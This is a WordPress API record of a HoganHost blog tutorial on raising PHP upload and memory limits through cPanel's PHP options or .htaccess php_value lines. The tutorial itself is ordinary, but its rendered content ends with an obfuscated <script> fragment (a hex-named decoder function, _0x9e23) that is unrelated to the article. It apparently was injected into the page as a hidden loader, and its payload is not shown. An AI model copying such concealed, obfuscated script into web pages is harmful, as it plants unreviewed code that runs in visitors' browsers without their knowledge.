{"id":292,"date":"2021-04-10T00:08:31","date_gmt":"2021-04-10T00:08:31","guid":{"rendered":"https:\/\/hoganhost.com.ng\/blog\/?p=292"},"modified":"2024-08-12T13:34:58","modified_gmt":"2024-08-12T12:34:58","slug":"how-to-increase-the-upload_max_filesize-limit-in-cpanel","status":"publish","type":"post","link":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/","title":{"rendered":"How to increase the upload_max_filesize limit in cPanel"},"content":{"rendered":"<p>In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how to increase PHP upload limit in cPanel or by modifying .htaccess file.<\/p>\n<h2>What you\u2019ll need<\/h2>\n<p>Before you begin this guide you\u2019ll need the following:<\/p>\n<ul>\n<li>Access to your hosting account\u2019s cPanel<strong>OR<\/strong>\n<ul>\n<li>Ability to connect via FTP client<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h2>Option 1 \u2013 Increasing PHP upload Limit in cPanel<\/h2>\n<p>If you don\u2019t have access to\u00a0<strong>cPanel<\/strong>, please refer to\u00a0<strong>Option 2<\/strong>.<\/p>\n<h3>Step 1 \u2014 Opening up PHP Settings<\/h3>\n<p>Log in to your cPanel and navigate to\u00a0<strong>Select PHP Version<\/strong>\u00a0\u2013&gt;\u00a0<strong>Switch to PHP Options<\/strong>:<\/p>\n<p><img decoding=\"async\" class=\"aligncenter size-medium wp-image-294\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM-300x159.png\" alt=\"\" width=\"300\" height=\"159\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM-300x159.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png 497w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-medium wp-image-295\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_102029NTMG2T2J-300x176.png\" alt=\"\" width=\"300\" height=\"176\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_102029NTMG2T2J-300x176.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_102029NTMG2T2J.png 396w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<h3>Step 2 \u2014 Changing Upload Limit values<\/h3>\n<p>Let\u2019s say you are having an error while trying to upload\u00a0<strong>19 Mb<\/strong>\u00a0WordPress theme file through your WordPress Admin Area.<br \/>\nThe following configuration illustrates appropiate settings for this example:<\/p>\n<ul>\n<li>Set\u00a0<strong>memory_limit<\/strong>\u00a0to\u00a0<code>128M<\/code>.\u00a0<strong>memory_limit<\/strong>\u00a0describes the maximum amount of memory a script can allocate. It is recommended to set this to maximum available value. Letter\u00a0<strong>M<\/strong>\u00a0stands for megabytes.<\/li>\n<li>Set\u00a0<strong>upload_max_filesize<\/strong>\u00a0to\u00a0<code>64M<\/code>.\u00a0<strong>upload_max_filesize<\/strong>\u00a0describes a maximum size of an uploaded file. It must be larger than the theme file mentioned in the example.<\/li>\n<li>Set\u00a0<strong>post_max_size<\/strong>\u00a0to\u00a0<code>64M<\/code>.\u00a0<strong>post_max_size<\/strong>\u00a0has a similar functionality to\u00a0<strong>upload_max_filesize<\/strong>. Make it larger than 19 MB (theme file) as well.<\/li>\n<\/ul>\n<p><img decoding=\"async\" class=\"aligncenter size-medium wp-image-296\" src=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_102136F50KZBaZ-300x155.png\" alt=\"\" width=\"300\" height=\"155\" srcset=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_102136F50KZBaZ-300x155.png 300w, https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_102136F50KZBaZ.png 549w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Don\u2019t forget to\u00a0<strong>Save<\/strong>\u00a0the changes.<\/p>\n<p>IMPORTANT! Your\u00a0<strong>cPanel<\/strong>\u00a0may be a bit different and you may not have found\u00a0<strong>Select PHP Version<\/strong>\u00a0section. Consult your hosting provider about modifying PHP variables.<\/p>\n<h2>Option 2 \u2013 Increasing PHP Upload Limit Using .htaccess<\/h2>\n<p>If there is no possibility to edit PHP settings via your cPanel, you can use another method which involves editing your\u00a0<strong>.htaccess<\/strong>\u00a0file by connecting via\u00a0<strong>FTP Client<\/strong>. The following tutorial explains connecting via FTP Client in detail:<\/p>\n<p>Note that\u00a0<strong>.htaccess<\/strong>\u00a0file is a hidden file, therefore you would need to enable its visibility.<\/p>\n<p>Add the following lines to\u00a0<strong>.htaccess<\/strong>\u00a0file to increase upload limit:<\/p>\n<pre><code>php_value memory_limit 128M\r\n\r\nphp_value upload_max_filesize 64M\r\n\r\nphp_value post_max_size 64M<\/code><\/pre>\n<h2>Conclusion<\/h2>\n<p>You have learned how to increase PHP upload limit in cPanel. You have also learned an alternative method to accomplish that using\u00a0<code>.htaccess<\/code>\u00a0file by connecting via FTP Client.<\/p>\n<p>Note that your website settings may be overriding server configuration. In this case, you would need to configure these settings separately.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":294,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[4],"tags":[],"class_list":["post-292","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cpanel"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>How to increase the upload_max_filesize limit in cPanel - HoganHost blog<\/title>\n<meta name=\"description\" content=\"In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how to increase PHP upload\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"How to increase the upload_max_filesize limit in cPanel - HoganHost blog\" \/>\n<meta property=\"og:description\" content=\"In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how to increase PHP upload\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/\" \/>\n<meta property=\"og:site_name\" content=\"HoganHost blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/facebook.com\/HoganHost\" \/>\n<meta property=\"article:published_time\" content=\"2021-04-10T00:08:31+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-12T12:34:58+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png\" \/>\n\t<meta property=\"og:image:width\" content=\"497\" \/>\n\t<meta property=\"og:image:height\" content=\"263\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Abigal okon\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:site\" content=\"@hoganhostng\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Abigal okon\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/\"},\"author\":{\"name\":\"Abigal okon\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\"},\"headline\":\"How to increase the upload_max_filesize limit in cPanel\",\"datePublished\":\"2021-04-10T00:08:31+00:00\",\"dateModified\":\"2024-08-12T12:34:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/\"},\"wordCount\":383,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png\",\"articleSection\":[\"Cpanel\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/\",\"name\":\"How to increase the upload_max_filesize limit in cPanel - HoganHost blog\",\"isPartOf\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png\",\"datePublished\":\"2021-04-10T00:08:31+00:00\",\"dateModified\":\"2024-08-12T12:34:58+00:00\",\"description\":\"In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how to increase PHP upload\",\"breadcrumb\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png\",\"width\":497,\"height\":263},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hoganhost.com.ng\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How to increase the upload_max_filesize limit in cPanel\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#website\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"name\":\"HoganHost blog\",\"description\":\"Keeping you connected to everything from HoganHost\",\"publisher\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#organization\",\"name\":\"HoganHost\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"contentUrl\":\"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png\",\"width\":466,\"height\":387,\"caption\":\"HoganHost\"},\"image\":{\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/facebook.com\/HoganHost\",\"https:\/\/x.com\/hoganhostng\",\"https:\/\/instagram.com\/officialhoganhost\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a\",\"name\":\"Abigal okon\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g\",\"caption\":\"Abigal okon\"},\"sameAs\":[\"https:\/\/hoganhost.com.ng\/blog\"],\"url\":\"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"How to increase the upload_max_filesize limit in cPanel - HoganHost blog","description":"In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how to increase PHP upload","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/","og_locale":"en_US","og_type":"article","og_title":"How to increase the upload_max_filesize limit in cPanel - HoganHost blog","og_description":"In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how to increase PHP upload","og_url":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/","og_site_name":"HoganHost blog","article_publisher":"https:\/\/facebook.com\/HoganHost","article_published_time":"2021-04-10T00:08:31+00:00","article_modified_time":"2024-08-12T12:34:58+00:00","og_image":[{"width":497,"height":263,"url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png","type":"image\/png"}],"author":"Abigal okon","twitter_card":"summary_large_image","twitter_creator":"@hoganhostng","twitter_site":"@hoganhostng","twitter_misc":{"Written by":"Abigal okon","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#article","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/"},"author":{"name":"Abigal okon","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a"},"headline":"How to increase the upload_max_filesize limit in cPanel","datePublished":"2021-04-10T00:08:31+00:00","dateModified":"2024-08-12T12:34:58+00:00","mainEntityOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/"},"wordCount":383,"commentCount":0,"publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png","articleSection":["Cpanel"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/","url":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/","name":"How to increase the upload_max_filesize limit in cPanel - HoganHost blog","isPartOf":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage"},"thumbnailUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png","datePublished":"2021-04-10T00:08:31+00:00","dateModified":"2024-08-12T12:34:58+00:00","description":"In some cases, default server settings may not let you upload larger files via your website. This tutorial shows how to increase PHP upload","breadcrumb":{"@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#primaryimage","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2021\/04\/oie_10159190AOITrFM.png","width":497,"height":263},{"@type":"BreadcrumbList","@id":"https:\/\/hoganhost.com.ng\/blog\/cpanel\/how-to-increase-the-upload_max_filesize-limit-in-cpanel\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hoganhost.com.ng\/blog\/"},{"@type":"ListItem","position":2,"name":"How to increase the upload_max_filesize limit in cPanel"}]},{"@type":"WebSite","@id":"https:\/\/hoganhost.com.ng\/blog\/#website","url":"https:\/\/hoganhost.com.ng\/blog\/","name":"HoganHost blog","description":"Keeping you connected to everything from HoganHost","publisher":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hoganhost.com.ng\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/hoganhost.com.ng\/blog\/#organization","name":"HoganHost","url":"https:\/\/hoganhost.com.ng\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","contentUrl":"https:\/\/hoganhost.com.ng\/blog\/wp-content\/uploads\/2022\/09\/hogan-host.png","width":466,"height":387,"caption":"HoganHost"},"image":{"@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/facebook.com\/HoganHost","https:\/\/x.com\/hoganhostng","https:\/\/instagram.com\/officialhoganhost"]},{"@type":"Person","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/af16a18c6cc966b92a6cb13b500f3f0a","name":"Abigal okon","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/hoganhost.com.ng\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/ef2272070d016c06ee69b30adce7c4e4b4faaa5c899c4b9224a5b1a43b1fb8d0?s=96&d=mm&r=g","caption":"Abigal okon"},"sameAs":["https:\/\/hoganhost.com.ng\/blog"],"url":"https:\/\/hoganhost.com.ng\/blog\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/292","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/comments?post=292"}],"version-history":[{"count":1,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/292\/revisions"}],"predecessor-version":[{"id":297,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/posts\/292\/revisions\/297"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media\/294"}],"wp:attachment":[{"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/media?parent=292"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/categories?post=292"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hoganhost.com.ng\/blog\/wp-json\/wp\/v2\/tags?post=292"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}